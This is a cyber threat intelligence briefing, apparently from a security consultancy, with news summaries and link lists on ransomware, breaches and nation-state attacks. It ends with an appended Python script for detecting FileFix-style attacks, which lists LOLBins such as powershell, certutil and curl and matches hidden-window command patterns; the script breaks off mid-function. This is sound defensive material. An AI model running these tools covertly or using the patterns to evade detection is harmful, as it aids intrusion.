The collapse of a 158-year-old company in the UK, KNP Logistics, highlights how even a single weak password can devastate an entire business. Hackers exploited poor password hygiene to deploy ransomware, halting operations and forcing the firm into administration. The attack exposed wider issues: outdated systems, lack of multi-factor authentication, and insufficient user training, all of which allowed cyber criminals to move freely within the network. With over 700 jobs lost and supply chains disrupted, KNP’s fate is a stark warning: even well-established companies are at risk when basic cyber security measures are overlooked. Strong credentials and proactive defence are not optional; they are business-critical.
Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
US manufacturer Clorox has filed a $380 million lawsuit against IT provider Cognizant, alleging gross negligence in a cyber attack that severely disrupted its operations. The claim centres on a help desk agent who reset credentials without verifying identity, allowing criminals to access Clorox’s systems. This led to halted manufacturing, product shortages and a lengthy recovery effort. Clorox says the attackers repeated the tactic to gain deeper access, including into IT security accounts. It further accuses Cognizant of failing to follow agreed procedures and compounding the damage through a poor incident response, with underqualified support and delayed containment efforts. Cognizant has disputed Clorox’s version of events.
US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
Microsoft has confirmed that several China-linked hacking groups have exploited security flaws in its on-premises SharePoint servers, resulting in breaches at over 400 organisations, including US government agencies. The National Nuclear Security Administration was reportedly among those affected. Microsoft has issued security updates and is urging all users to apply them, warning that attacks are likely to continue. SharePoint remains widely used by large organisations for document collaboration, making the scale of the threat particularly concerning for those operating older systems.
Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
Check Point has reported a sharp global rise in cyber attacks, with weekly incidents reaching nearly 2,000 per organisation; a 143% increase over four years. Europe saw the steepest annual growth, up 22%, driven by geopolitical tensions and fragmented regulation. Sectors under sustained pressure include education, government, and telecommunications, with education alone facing over 4,300 weekly attacks. One in four ransomware attacks now affects European firms, with business services and manufacturing the most targeted. The report warns that a reactive stance is no longer viable and urges a prevention-first approach with layered defences and clear visibility of threats.
https://cybernews.com/security/cyberattacks-surge-in-north-america-and-europe/
68% of Organisations Experienced Data Leakage from Employee AI Usage
A recent survey has found that 68% of organisations have experienced data leakage incidents linked to staff sharing sensitive information with AI tools. This comes despite 90% of respondents expressing confidence in their existing cyber security controls. Only 23% of organisations have implemented dedicated AI security policies. Looking ahead, 80% of respondents said that building a strong internal security culture remains their biggest challenge. As AI adoption accelerates, many security leaders are shifting their focus from traditional operations to strengthening infrastructure and staff awareness, particularly in light of rising ransomware threats and risks tied to third-party AI suppliers.
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Mobile security provider Zimperium has warned of a sharp rise in mobile-related cyber threats during the busy summer travel season. Over 5 million unsecured public Wi-Fi networks have been identified globally in 2025, with a third of users still connecting to them. Mobile devices, now a key access point for corporate data, are increasingly exposed to risks such as phishing disguised as travel updates, malicious apps, and data theft via public Wi-Fi. The threat is particularly high in Southeast Asia and across major cities. Organisations are urged to strengthen mobile defences and ensure employee devices remain protected while travelling.
Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
Cyber threats targeting the aviation sector are increasing in both frequency and severity, driven by greater system connectivity and heightened geopolitical tensions. Recent attacks have disrupted flights, exposed sensitive passenger data, and caused significant financial losses. Ransomware activity alone has risen by 600% over the past year. Regulatory bodies across the US, EU and globally are strengthening cyber security standards, with mandatory requirements due by 2025. However, fragmented compliance obligations, ageing technology, and widespread reliance on social engineering tactics continue to expose the industry. Despite higher-than-average cyber security investment, effective staff training and better supply chain oversight remain critical.
https://www.helpnetsecurity.com/2025/07/21/aviation-industry-cybersecurity-crisis/
Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
A multinational survey reports that nearly half of managed service providers (MSPs) have set aside funds specifically for ransomware payments, despite growing pressure from insurers and governments to avoid doing so. The survey found that 45% had a dedicated budget for this, while 36% rely on cyber insurance. However, 11% had no financial safeguards in place at all. Concerns are now shifting toward artificial intelligence, with 67% of MSPs reporting AI-driven attacks last year. As AI threats escalate in scale and sophistication, 84% of MSP clients now expect their providers to manage cyber security as part of their core services, underscoring the need for proactive defences.
UK Confirms Ransomware Payment Ban for Public Sector and CNI
The UK government will ban public sector and critical national infrastructure organisations from paying ransomware demands, following strong support during a public consultation. The aim is to deter attackers by removing financial incentives and better protect essential services like healthcare, education and transport. Alongside this, a new mandatory reporting regime will be introduced to help law enforcement gather intelligence and disrupt criminal networks. However, some experts have raised concerns that these measures could lead to underreporting, misuse of third parties, or increased pressure on private sector firms still permitted to pay, potentially creating a two-tier risk landscape.
https://www.infosecurity-magazine.com/news/uk-ransomware-payment-ban-public/
University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
A 21-year-old university student has been jailed for seven years after selling over 1,000 phishing kits that enabled criminals to impersonate legitimate organisations and steal personal and financial information. The kits, distributed via encrypted platforms, targeted 69 institutions across 24 countries, contributing to an estimated £100 million in global losses. Authorities described the operation as highly organised, with the individual offering ongoing technical support to other fraudsters. This case underscores how cyber criminals are monetising phishing tools at scale and highlights the growing need for organisations to protect against deceptive online tactics designed to exploit customers and brand trust.
$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
An American woman has been sentenced to over eight years in prison for helping North Korean IT workers pose as US-based staff and secure jobs at over 300 companies, generating more than $17 million in illicit income. The scheme involved shipping corporate laptops abroad, forging payroll documents and using stolen identities. North Korea is believed to operate up to 4,000 such IT workers worldwide, generating as much as $600 million annually to fund state objectives. In response, the US has offered rewards of up to $15 million for information leading to the arrest of individuals involved in these activities.
UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
The UK has imposed sanctions on over 20 Russian individuals and entities linked to cyber attacks across Europe. Those named include officers from Russia’s military intelligence agency accused of targeting democratic institutions, media, energy networks and communications infrastructure. The sanctions follow broader efforts to disrupt Russian disinformation campaigns and respond to operations by groups such as NoName057(16), which has targeted political events across the EU. UK officials described these activities as part of a deliberate campaign to destabilise Europe and undermine both Ukrainian sovereignty and British security interests.
Governance, Risk and Compliance
Most cyber risks driven by few employees, study shows | SC Media
Threats
Ransomware, Extortion and Destructive Attacks
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Nearly Half of MSPs Have Dedicated Kitty For Ransomware Incidents - IT Security Guru
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
CISA and FBI warn of escalating Interlock ransomware attacks
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
Storm-2603 spotted deploying ransomware on exploited SharePoint servers - Help Net Security
Worry about the basics of ransomware, not the AI threat - Tech Monitor
BlackSuit ransomware extortion sites seized in Operation Checkmate
New Phobos and 8base ransomware decryptor recover files for free
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
Ransomware Victims
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
The password that sank a 158-year-old business - IT Security Guru
Major European healthcare network discloses security breach
Two more entities have folded after ransomware attacks – DataBreaches.Net
Russian alcohol retailer WineLab closes stores after ransomware attack
Phishing & Email Based Attacks
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
That “credit card security” email might be a trap | Cybernews
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Other Social Engineering
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
Dark Web Hackers Moonlight as Travel Agents
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Fraud, Scams and Financial Crime
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Fake Receipt Generators Fuel Rise in Online Fraud - Infosecurity Magazine
Return Fraud Is Rampant Thanks to Free Shipping, Customer Behavior - Business Insider
The fraud trends shaping 2025: Pressure builds on online retailers - Help Net Security
Head of AI company warns of AI fraud | The Independent
'Explosive growth' in number of Channel Island fraud complaints - Island FM
$17 Million Is Lost in ATM Scam That Spread on TikTok, Officials Say - The New York Times
Artificial Intelligence
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
How AI is changing the GRC strategy | CSO Online
People don't trust AI but they're increasingly using it anyway | ZDNET
Image watermarks meet their Waterloo with UnMarker • The Register
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
3 Ways Security Teams Can Minimize Agentic AI Chaos
How the EU Is Fighting Back Against Deepfakes - IT Security Guru
Nearly 2,000 MCP Servers Possess No Security Whatsoever
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Worry about the basics of ransomware, not the AI threat - Tech Monitor
WeTransfer ToS adding 'machine learning' caused freakout • The Register
2FA/MFA
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Veeam Recovery Orchestrator users locked out after MFA rollout
Malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
NCSC: Russian malware controls emails | Cybernews
Hackers breach Toptal GitHub account, publish malicious npm packages
npm phishing attack laces popular packages with malware • The Register
Stealth backdoor found in WordPress mu-Plugins folder
Cyber criminals are Targeting US Businesses with Malicious USB Drives: By Robert Siciliano
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Arch Linux pulls AUR packages that installed Chaos RAT malware
Warning: Hacker Might Be Prepping This Steam Game to Spread Malware
Threat Actors Weaponizing .hwp Files to Deliver RokRAT Malware
Bots/Botnets
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Mobile
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Here's What Phone Thieves Do to Prevent You From Tracking Your Device
5M Public, Unsecured Wi-Fi Networks Found Exposed | Security Magazine
This attack could give criminals control of your mobile or desktop browser - PhoneArena
Surveillance Firm Bypasses SS7 Protections to Retrieve User Location - SecurityWeek
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Internet of Things – IoT
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Is your Ring camera showing strange logins? Here's what's going on | ZDNET
Ring tries to explain 'May 28' bug, but users aren't buying it - Android Authority
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
When Your Power Meter Becomes a Tool of Mass Surveillance | Electronic Frontier Foundation
Data Breaches/Leaks
Startup takes personal data stolen by malware and sells it on to other companies | Malwarebytes
Most data breaches have unknown causes as transparency continues to fall - Help Net Security
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
Holyrood | No evidence of data loss in Glasgow City Council cyber-attack, experts say
Inquiry after SAS identities leaked in new breach
Regulator Claims 9,000+ Clients' Data Hit Dark Web in Security Breach
Risika Data Breach Exposes 100M Swedish Records to Fraud Risks
France: New Data Breach Could Affect 340,000 Jobseekers - Infosecurity Magazine
People are getting over $4,000 from the T-Mobile data breach settlement
Dior begins sending data breach notifications to US customers
Dell scoffs at breach, says miscreants stole ‘fake data' • The Register
750,000 Impacted by Data Breach at The Alcohol & Drug Testing Service - SecurityWeek
Marketing, Law Firms Say Data Breaches Impact Over 200,000 People - SecurityWeek
Data breach feared after cyber attack on AMEOS hospitals in Germany – DataBreaches.Net
Major German media group falls victim to hacker attack – DW – 07/22/2025
1.4 Million Affected by Data Breach at Virginia Radiology Practice - SecurityWeek
Organised Crime & Criminal Actors
Dark Web Hackers Moonlight as Travel Agents
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
New Wave of Crypto-Hijacking Infects 3,500+ Websites
3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics
Insider Risk and Insider Threats
Most cyber risks driven by few employees, study shows | SC Media
Supply Chain and Third Parties
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Firmware Vulnerabilities Continue to Plague Supply Chain
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Cloud/SaaS
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK blames Russia’s infamous ‘Fancy Bear’ group for Microsoft cloud hacks | CSO Online
Outages
Phone networks down: EE, BT, Three, and Vodafone all not working in mass outage | The Independent
Alaska’s system-wide ground stop ‘not a cyber security event’ | News | Flight Global
Has the media industry learned from the Crowdstrike outage? - TVBEurope
Encryption
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
Linux and Open Source
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
How unvalidated code is putting UK national security at risk - Tech Monitor
Digital sovereignty becomes a matter of resilience for Europe - Help Net Security
Arch Linux pulls AUR packages that installed Chaos RAT malware
Passwords, Credential Stuffing & Brute Force Attacks
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Weak Password
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
The password that sank a 158-year-old business - IT Security Guru
Hard-Coded Credentials Found in HPE Instant On Devices Allow Admin Access
New QR Code Attack Via PDFs Evades Detection Systems and Harvest Credentials
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Hackers scanning for TeleMessage Signal clone flaw exposing passwords
Regulations, Fines and Legislation
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Monzo’s £21m fine highlights banks’ cyber security failures | Computer Weekly
Six months into DORA, most financial firms are still not ready - Help Net Security
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
ENISA Turns to Experts to Steer EU Cyber Regulations
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Government responds to feedback on ransomware consultation | Practical Law
After website hack, Arizona election officials unload on Trump’s CISA | CyberScoop
Models, Frameworks and Standards
Six months into DORA, most financial firms are still not ready - Help Net Security
Careers, Working in Cyber and Information Security
AI is here, but you still need juniors, say cyber security pros | Cybernews
How to Advance from SOC Manager to CISO?
How to Build a Cyber Security Team to Maximize Business Impact
How to land your first job in cyber security - Help Net Security
Law Enforcement Action and Take Downs
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Europol targets Kremlin-backed cyber crime gang NoName057(16)
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
Operator of Jetflicks illegal streaming service gets 7 years in prison
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europe cyber attacks surge amid geopolitical tensions | Cybernews
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
UK uncovers novel Microsoft snooping malware, blames GRU • The Register
NCSC: Russian malware controls emails | Cybernews
Why it's time for the US to go on offense in cyber space | CyberScoop
Recovery IS strength: The test of American cyber power | SC Media
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
Opinion | To fight cyberwar, the US must establish a tech academy - The Washington Post
Nation State Actors
Europe cyber attacks surge amid geopolitical tensions | Cybernews
How Can Companies Guard Against Rising Nation-State Cyber Threats? | Phelps Dunbar - JDSupra
China
3 China Nation-State Actors Target SharePoint Bugs
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Singapore warns China-linked group UNC3886 targets its critical infrastructure
China warns of backdoored devices, on land and under the sea • The Register
Russia
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
British institutions to be banned from paying ransoms to Russian hackers – POLITICO
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Operation CargoTalon Attacking Russian Aerospace & Defence to Deploy EAGLET Implant
Russian alcohol retailer WineLab closes stores after ransomware attack
Iran
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
Iran-Linked DCHSpy Android Malware Masquerades as VPN Apps to Spy on Dissidents
Iranian Hackers Deploy New Android Spyware Version - Infosecurity Magazine
Will An Iran Cyber Attack Panic Usher In A New Patriot Act? – OpEd – Eurasia Review
Ex-IDF cyber chief talks Iran, Scattered Spider with The Reg • The Register
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
North Korea
Europe cyber attacks surge amid geopolitical tensions | Cybernews
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
From Missiles to Malware: India-Pakistan Cyber Rivalry and Lessons for Taiwan – Taiwan Insight
Tools and Controls
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
AI is here, but you still need juniors, say cyber security pros | Cybernews
As AI tools take hold in cyber security, entry-level jobs could shrink - Help Net Security
Firmware Vulnerabilities Continue to Plague Supply Chain
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
Majority of CISOs Lack Full Visibility Over APIs - IT Security Guru
How to harden your Active Directory against Kerberoasting
What Makes Great Threat Intelligence?
How to Use Threat Intelligence to Enhance Cyber Security Operations
DNS security is important but is DNSSEC a failed experiment? • The Register
Veeam Recovery Orchestrator users locked out after MFA rollout
3 Ways Security Teams Can Minimize Agentic AI Chaos
Reclaiming Control: How Enterprises Can Fix Broken Security Operations - SecurityWeek
Your app is under attack every 3 minutes - Help Net Security
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Other News
What To Know About Dangerous Airport And Airline Cyber Attacks, And Why They're On The Rise
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
Summer habits could increase cyber risk to enterprise data - Data Centre & Network News
From beaches to breaches: Summer work habits put enterprise data at risk - Digital Journal
NATO warns ports vulnerable to 'unprecedented' cyber threats - FreightWaves
Meta and Google are laying a fast-growing web of mega subsea cables
Ports are getting smarter and more hackable - Help Net Security
Coast Guard Issues Cyber Rule for Maritime Transport Safety
World Health Organisation CISO on securing global health emergencies - Help Net Security
Loaf and order: Belgian police launch bread-based cyber security campaign • Graham Cluley
Basic cyber security lapses are leaving US infrastructure exposed, top experts warn - Nextgov/FCW
How did Stuxnet impact cyber operations? The US House aims to find out | SC Media
Vulnerability Management
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
How quickly do we patch? A quick look from the global viewpoint - SANS Internet Storm Center
VMware portal prevents some users from downloading patches • The Register
Vulnerabilities
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Microsoft says some SharePoint hackers now using ransomware | Reuters
CitrixBleed 2: 100 Organisations Hacked, Thousands of Instances Still Vulnerable - SecurityWeek
Microsoft fixes two SharePoint zero-days under attack, but it's not over - how to patch | ZDNET
Cisco confirms active exploitation of ISE and ISE-PIC flaws
Hardcoded credentials found in HPE Aruba Instant On Wi-Fi devices
Critical Vulnerabilities Patched in Sophos Firewall - SecurityWeek
SonicWall Patches Critical SMA 100 Vulnerability, Warns of Recent Malware Attack - SecurityWeek
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Microsoft mistakenly tags Windows Firewall error log bug as fixed
New 7-Zip Vulnerability Enables Malicious RAR5 File to Crash Your System
Another massive security snafu hits Microsoft • The Register
High-Severity Flaws Patched in Chrome, Firefox - SecurityWeek
Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems
Critical NVIDIA Container Toolkit Flaw Allows Privilege Escalation on AI Cloud Services
Hackers Exploit Critical CrushFTP Flaw to Gain Admin Access on Unpatched Servers
VMware portal prevents some users from downloading patches • The Register
CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025:
-Most Cyber Security Risk Comes from Just 10% of Employees
-Stop Settling for Check-the-Box Cyber Security Policies
-A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
-Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
-Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
-Supplier Risk Is Breaking the Size Myth in Cyber
-Most European Financial Firms Still Lagging on DORA Compliance
-AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
-Ransomware Surges 63% in Q2
-All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
-North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
-Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
-Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
In our briefing this week, and continuing our opening theme from last week, we share research insights that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, and the need to have cyber security policies that reflect the realities of the workplace and create a security culture. We also report on a new social engineering tactic that encourages employees to run malicious code for the attacker. Other employee risks continue to evolve, including the insider risk of recruiting North Korean IT workers who access sensitive data and extort the employer.
We highlight actions that organisations should focus on now: these include upgrading to Windows 11; managing the risks in their supply chain; and for those organisations in scope, progressing their compliance for DORA. We also highlight the evolving risk of AI cloaking tools, and the surge in ransomware. The consequences of attacks are emphasised by the breach of 6.5m customer records at the UK retailer Co-Op, and a record spike in crypto thefts by North Koreans. Finally, we include news of Russian state and citizen attackers focusing on the UK and Ukraine-aligned countries.
Top Cyber Stories of the Last Week
Most Cyber Security Risk Comes from Just 10% of Employees
A new study by Living Security and the Cyentia Institute has found that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, challenging assumptions about who poses the greatest cyber risk. Surprisingly, remote and part-time staff are generally less risky than their in-office, full-time colleagues. The report argues for focused action plans and controls for those employees who present the greatest risk.
https://www.helpnetsecurity.com/2025/07/16/human-cybersecurity-risk-employees/
Stop Settling for Check-the-Box Cyber Security Policies
Many organisations still rely on outdated or overly rigid cyber security policies that fail to reflect how work is actually done. This mismatch often drives employees to find workarounds, weakening overall defences. Complex password rules, poorly implemented multi-factor authentication, and generic training programmes are common pitfalls. A recent study found that 65% of office workers admit to bypassing policies, with 70% of IT leaders reporting unauthorised AI use. Effective cyber security requires policies that are practical, tailored to roles, and regularly updated based on real-world feedback, helping foster a security culture rather than just ticking compliance boxes.
https://www.helpnetsecurity.com/2025/07/15/stop-settling-for-check-the-box-cybersecurity-policies/
A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
Researchers have warned of a new social engineering tactic called FileFix, which exploits common user behaviour to silently trigger malicious commands. By encouraging users to paste a copied link into Windows File Explorer, attackers can run hidden code without raising security alerts. Although current tests involve harmless code, threat actors are already using the method in real-world scenarios, indicating likely progression to malware delivery. The technique does not rely on software flaws but manipulates user trust. Organisations are urged to enhance user awareness and review incident response plans to address this fast-evolving threat.
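The following is an added detection example for the FileFix pattern described above; it is not code from the original briefing or from the researchers who named the technique. It triages Sysmon Event ID 1-style process-creation records (flattened to one JSON object per line, a constructed format) and scores each one for the tell-tale combination: an interpreter or LOLBin started directly by explorer.exe, with hints that the command line was pasted into the File Explorer address bar rather than typed. The list of suspicious child processes, the padding heuristic, the alert threshold and the sample events are all assumptions made for this example.

```python
"""
FileFix-style process-creation triage (added example, constructed telemetry).
"""
import json
import re
from dataclasses import dataclass, field

# Interpreters and LOLBins that rarely need to be launched straight from
# explorer.exe with an elaborate command line. Illustrative list (assumption).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe",
}

# Flags that hide the window or obscure the payload.
HIDDEN_FLAGS = re.compile(r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|/c\s)", re.I)

# A long run of spaces followed by a PowerShell comment marker or a UNC-looking
# tail: the visible end of the pasted string mimics a file path while the
# command sits off-screen to the left. Heuristic, not a documented signature.
ADDRESS_BAR_PADDING = re.compile(r"\s{8,}(#|\\\\)")

REMOTE_URL = re.compile(r"https?://", re.I)

# Minimum number of indicators before an event is reported. A single shell
# spawned by explorer.exe (a user opening cmd from Start) should not alert.
ALERT_THRESHOLD = 2


@dataclass
class Finding:
    parent: str
    child: str
    command_line: str
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
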